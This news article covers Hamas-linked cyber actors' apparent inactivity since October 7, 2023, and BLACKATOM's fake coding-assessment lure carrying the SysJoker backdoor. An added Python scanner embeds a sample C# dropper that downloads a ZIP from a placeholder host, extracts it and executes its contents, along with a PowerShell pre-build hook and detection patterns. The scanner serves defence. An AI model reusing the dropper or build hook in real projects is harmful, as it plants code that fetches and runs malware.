
Hamas-linked threat actors have defied norms, with no discernible uptick in cyber operations prior to the group's attack in Israel — and a complete abandonment of them thereafter.


Cyber threat actors linked with Hamas have seemingly ceased activity ever since the Oct. 7, 2023 terrorist attack in Israel, confounding experts.

Combination warfare is old hat in 2024. As Mandiant said in a newly published report, cyber operations have become a "tool of first resort" for any nation or nation-aligned group around the world engaged in protracted conflict, be it political, economic, or warlike in nature. Russia's invasion of Ukraine, preceded and supported by historic waves of cyber destruction, espionage, and misinformation, is of course the quintessential example.

Not so in Gaza. If today's playbook is to support resource-intensive kinetic war with low-risk, low-investment cyber war, Hamas has thrown out the book.

"What we saw all through September 2023 was very typical Hamas-linked cyber espionage activities — their activity was very consistent with what we've seen for years," Kristen Dennesen, threat intelligence analyst for Google's Threat Analysis Group (TAG), said in a press conference this week. "That activity continued on until just before October 7 — there wasn't any kind of shift or uptick prior to that point. And since that time, we haven't seen any significant activity from these actors."

Failing to ramp up cyberattacks prior to Oct. 7 might be construed as strategic. But regarding why Hamas (irrespective of its supporters) has quit its cyber operations instead of using them to support its war effort, Dennesen admitted, "We don't offer any explanation as to why because we don't know."

Hamas Pre-Oct. 7: 'BLACKATOM'

Typical Hamas-nexus cyberattacks include "mass phishing campaigns to deliver malware or to steal email data," said Dennesen, as well as mobile spyware in the form of various Android backdoors, also delivered through phishing. "And finally, in terms of their targeting: very persistent targeting of Israel, of Palestine, their regional neighbors in the Middle East, as well as targeting of the US and Europe," she explained.

For a case study in what that looks like, take BLACKATOM — one of the three primary Hamas-linked threat actors, alongside BLACKSTEM (aka MOLERATS, Extreme Jackal) and DESERTVARNISH (aka UNC718, Renegade Jackal, Desert Falcons, Arid Viper).

In September, BLACKATOM began a social engineering campaign aimed at software engineers in the Israel Defense Forces (IDF), as well as Israel's defense and aerospace industries.

The ruse involved posing on LinkedIn as employees of legitimate companies and messaging targets with fake freelance job opportunities. After initial contact, the false recruiters would send a lure document with instructions for participating in a coding assessment.

The fake coding assessment required recipients to download a Visual Studio project, masquerading as a human resources management app, from an attacker-controlled GitHub or Google Drive page. Recipients were then asked to add features to the project, to demonstrate their coding skills. Buried in the project, though, was a function that secretly downloaded, extracted, and executed a malicious ZIP file on the affected computer once the code was built and run. Inside the ZIP: the SysJoker multiplatform backdoor.
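As an added illustration of how a "take-home assessment" project can hide a dropper of the kind described above (this is example code written for this page, not BLACKATOM's project or anything published by Google TAG), the following Python triage script scans a Visual Studio project directory before anyone opens or builds it. It flags source files that combine a network download, an archive extraction, and a process launch, and project files that run commands at build time. The sample project it scans is constructed inline; its file names, the URL, and the API-name patterns are illustrative assumptions, not indicators from the real campaign.

```python
"""Triage an untrusted 'coding assessment' project for dropper behaviour.

Added example, not code from the article or from Google TAG. It looks for the
three-stage pattern the article describes (download, extract, execute) inside
C# sources, and for MSBuild hooks that would run commands at build time.
The sample project below is constructed for the demonstration.
"""
import re
import tempfile
from pathlib import Path

# Constructed sample project: one innocuous file, one hidden dropper, and a
# project file with a build-time hook. None of this is real BLACKATOM code.
SAMPLE_FILES = {
    "HrApp/Employees.cs": """
using System;
public class Employees { public void Add(string name) { Console.WriteLine(name); } }
""",
    "HrApp/Helpers/Startup.cs": """
using System.IO;
using System.Net;
using System.IO.Compression;
using System.Diagnostics;
public static class Startup {
    public static void Init() {
        var tmp = Path.GetTempPath();
        new WebClient().DownloadFile("https://example.invalid/update.zip", tmp + "u.zip");
        ZipFile.ExtractToDirectory(tmp + "u.zip", tmp + "u");
        Process.Start(tmp + "u/svc.exe");
    }
}
""",
    "HrApp/HrApp.csproj": """
<Project Sdk="Microsoft.NET.Sdk">
  <Target Name="PreBuild" BeforeTargets="PreBuildEvent">
    <Exec Command="powershell -File setup.ps1" />
  </Target>
</Project>
""",
}

# .NET API names that typically make up each stage of a dropper chain.
STAGES = {
    "download": re.compile(r"\b(WebClient|HttpClient|WebRequest|DownloadFile|DownloadData|DownloadString)\b"),
    "extract": re.compile(r"\b(ZipFile|ZipArchive|ExtractToDirectory|GZipStream)\b"),
    "execute": re.compile(r"\b(Process\.Start|ProcessStartInfo|Assembly\.Load|CreateProcess)\b"),
}

# MSBuild constructs that execute commands when the project is built.
BUILD_HOOKS = re.compile(r"<Exec\b|<PreBuildEvent>|<PostBuildEvent>|BeforeTargets=|AfterTargets=|<UsingTask\b")

SOURCE_EXT = {".cs", ".vb"}
PROJECT_EXT = {".csproj", ".vbproj", ".targets", ".props"}


def stages_in(text: str) -> set:
    """Return the set of dropper stages whose API patterns appear in the text."""
    return {name for name, rx in STAGES.items() if rx.search(text)}


def scan_project(root: Path) -> list:
    """Walk the project and return findings as dicts (file, kind, stages)."""
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        text = path.read_text(errors="replace")
        if path.suffix.lower() in SOURCE_EXT:
            hit = stages_in(text)
            # Download plus execute is already a dropper; require at least two stages.
            if len(hit) >= 2:
                findings.append({"file": rel, "kind": "dropper-chain", "stages": sorted(hit)})
        elif path.suffix.lower() in PROJECT_EXT and BUILD_HOOKS.search(text):
            findings.append({"file": rel, "kind": "build-time-exec", "stages": []})
    return findings


def write_sample(root: Path) -> None:
    """Materialise the constructed sample project under root."""
    for rel, body in SAMPLE_FILES.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body)


def demo() -> list:
    """Write the sample project to a temp dir and scan it; returns the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        write_sample(root)
        return scan_project(root)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Point the scanner at the unpacked project directory before opening it in Visual Studio; a match is a reason to stop and inspect, not proof of malice, and a clean result is not proof of absence, since string matching is trivially evaded by obfuscation. The practical rule the campaign illustrates is simpler: build and run an unsolicited assessment project only inside a disposable VM with no access to corporate credentials.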

'Nothing Like Russia'

It may seem counterintuitive that Hamas' Oct. 7 assault was not paired with a shift in its cyber activity along the lines of Russia's model. This may be due to its prioritization of operational security: the secrecy that made the terror attack so shockingly effective.

Less explicable is why the most recent confirmed Hamas-related cyber activity, according to Mandiant, occurred back on Oct. 4. (Gaza, meanwhile, has suffered from significant Internet disruptions in recent months.)

"I think the key thing to draw out is that these are very different conflicts, with very different entities involved," said Shane Huntley, senior director at Google TAG. "Hamas is nothing like Russia. And therefore, it's not surprising that the use of cyber is very different [depending on] the nature of the conflict, between standing armies versus a sort of attack like we saw on October 7."

But Hamas likely has not fully retired its cyber operations. "While the outlook for future cyber operations by Hamas-linked actors is uncertain in the near term, we do anticipate that Hamas cyber activity will eventually resume. It should be focused on espionage for intelligence-gathering on these intra-Palestinian affairs, Israel, the United States, and other regional players in the Middle East," Dennesen noted.

About the Author(s)

Nate Nelson, Contributing Writer

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.
